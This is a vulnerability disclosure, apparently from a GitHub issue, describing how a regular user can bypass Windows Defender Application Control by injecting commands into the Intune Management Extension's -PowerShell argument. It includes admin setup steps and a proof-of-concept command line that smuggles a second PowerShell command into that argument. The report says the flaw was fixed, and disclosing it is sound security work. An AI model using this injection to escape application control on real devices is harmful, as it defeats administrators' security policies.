Intune Windows Agent bypass explanation

[kimoppalfens]

If you place the screenshots in a subolder called images to the relative path of this report than the output/screenshots should appear inline with the report

Summary

If a device has the Intune Management Extensions configured as a Windows Defender Application Control Managed Installer than the Intune Management Extensions can be used as a WDAC bypass by a regular user.

FYI, This was fixed by removing the -PowerShell switch below in point 8. Intune Managed Extension WDAC Bypass.md Intune Managed Extension WDAC Bypass.zip Set-IntuneMEasWDACMI.ps1.txt Intune Managed Extension WDAC Bypass.md Intune Managed Extension WDAC Bypass.zip Set-IntuneMEasWDACMI.ps1.txt

Description

The executable for the Intune Management Extension, Microsoft.Management.Services.IntuneWindowsAgent.exe, has a -PowerShell parameter. This allows anyone to launch a PowerShell Script using the Intune Management extension. Doing so launches a new PowerShell host that is still locked in PowerShell Constrained Language mode. The arguments on the -PowerShell option are however not escaped correctly allowing command injection.

The command injection can be used to write a new file to disk. That file will receive the NTFS Extended Attribute marking the file as written to disk by the Intune Managed Extension. If the file written to disk is a PowerShell Script these attributes will make sure the script runs trusted in FullLanguage mode. If a PE file is written to disk it would become trusted based on these extended attributes as well.

Steps to Reproduce: (Add details for how we can reproduce the issue)

Preparing the machine to be executed as a user with Local Administrator credentials

To quickly reproduce this we'll prepare the machine using local scripts. These preparation steps are done as someone with administrator credentials. They're not part of the actual security issue though. In a regular environment these prerequisites will probably be handled by the Intune environment by someone that wants to use Intune as a Managed Installer.

Defining a Managed installer is documented Here

Setting the Intune Management Extensions as a managed installer

1. Create temp directory c:\temp by running New-Item -ItemType Directory c:\temp

   

2. Set the PowerShell Execution Policy to RemoteSigned as needed by running Set-ExecutionPolicy RemoteSigned

   

3. Copy the set-ApplockerMIPolicy.ps1 to c:\temp and Run script to define the Intune Management Extension as a Wdac Managed installer. (Waiting for the binaries for applocker to be created could take a while!) Notes: The set-ApplockerMIPolicy script was delivered with the report

   • Navigate to the temp folder by running set-location c:\temp
   • Set the Managed installer policy by running .\Set-ApplockerMIPolicy.PS1

   

Apply the WDAC Enforced policy with Managed installer functionality

1. Configure a WDAC Enforced policy with Managed Installer ruleoption

   • Copy the Windows Included Example policy DefaultWindows_Enforced to C:\Temp by running copy-item c:\Windows\schemas\CodeIntegrity\ExamplePolicies\DefaultWindows_Enforced.xml .\

   

   • Enable the Windows Managed Installer option in the WDAC policy by running Set-RuleOption -FilePath .\DefaultWindows_Enforced.xml -Option 13
   • Build the binary policy by running ConvertFrom-CiPolicy -XMLFilePath C:\Temp\WDACEnforceWithMI.XML -BinaryFilePath C:\Temp\Binary.bin

   

   • $Global:SiPolicyPathTemp = Join-Path $env:SystemRoot 'System32\codeintegrity\SIPolicyTmp.p7b'
   • Copy-Item "C:\temp\BinaryPolicy.bin" $Global:SiPolicyPathTemp
   • $wmiResult = Invoke-CimMethod -Namespace root\Microsoft\Windows\CI -ClassName PS_UpdateAndCompareCIPolicy -MethodName Update -Arguments @{FilePath = $Global:SiPolicyPathTemp}

   

Create a local regular user to test bypass

1. Create local user named EvilKieken by running New-LocalUser evilkieken

   

Proof of concept bypass to be executed as a regular user WITHOUT Local Administrator credentials

This step is the weaponisation of the bypass and can be executed as a regular user on a machine that is prepped with the steps above or on any device that has a config where the Intune Management Extensions are configured as a WDAC Managed installer.

1. Log in as the user evilkieken

2. Open a PowerShell window as a regular user.

3. If the Intune Management Extensions are already installed navigate to the installation folder.

   • sl 'C:\Program Files (x86)\Microsoft Intune Management Extension\'

4. Optional: If the Intune Managed Extensions aren't installed you can bring your own. Copy the Intune Managed Extension folder into C:\Temp if it isn't installed yet.

5. Navigate to the folder holding the Intune Managed Extension binaries or to c:\temp if you brought your own binaries

   • sl 'C:\Program Files (x86)\Microsoft Intune Management Extension\'

   or

   • sl 'c:\temp'

   

6. Check whether PowerShell Constrained Language mode is enabled by running: $ExecutionContext.SessionState.LanguateMode

   

7. Check whether method invocation works. This should give an error when PowerShell Constrained Language mode is enforced.

   • Check Method Invocation is blocked by running [math]::sqrt(9)

Notes: This should tell you that the method cannnot be invoked in this language mode. Error messages reads: Cannot invoke method. Method invocation is supported only on core types in this language mode.

8. Create the PowerShell script to demonstrate the bypass by running

   • .\Microsoft.Management.Services.IntuneWindowsAgent.exe -powershell c:\temp\IMESidecarbypassscript.ps1 c:\temp\IMESidecarBypassOutPut.txt c:\temp\IMESidecarBypassError.txt c:\temp\IMESidecarBypassTimeOut.txt 600 "powershell.exe -command set-content -Path C:\temp\bypass.ps1 -Value '[math]::sqrt(9);`$executioncontext.sessionstate.languagemode' #"

   

NOTE!: The command above is a single command line

7. Verify the NTFS Extended attributes have been added to bypass.ps1 by running fstutil.exe file queryea c:\Temp\bypass.ps1

Notes: This should show you the $Kernel.Smartlocker.Originclaim proving the file was written to disk by a managed installer.

8. Validate the bypass works by running C:\temp\bypass.ps1

Notes: The Math invocation function now works and the script specifies it runs in full language mode proving the bypass is functional.

Supporting materials/ references:

• Script to set Intune Management Extensions as a Managed installer (files\Set-ApplockerMIPolicy.PS1)
• Images with screenshots in subfolder images (images\*)
• binaries for Intune Management Extension version 1.44.201.0 (files\Microsoft Intune Management Extension - 1.44.201.0.zip)

[bohops]

@kimoppalfens This is fantastic! Thank you for disclosing the details. I have added the reference to the list!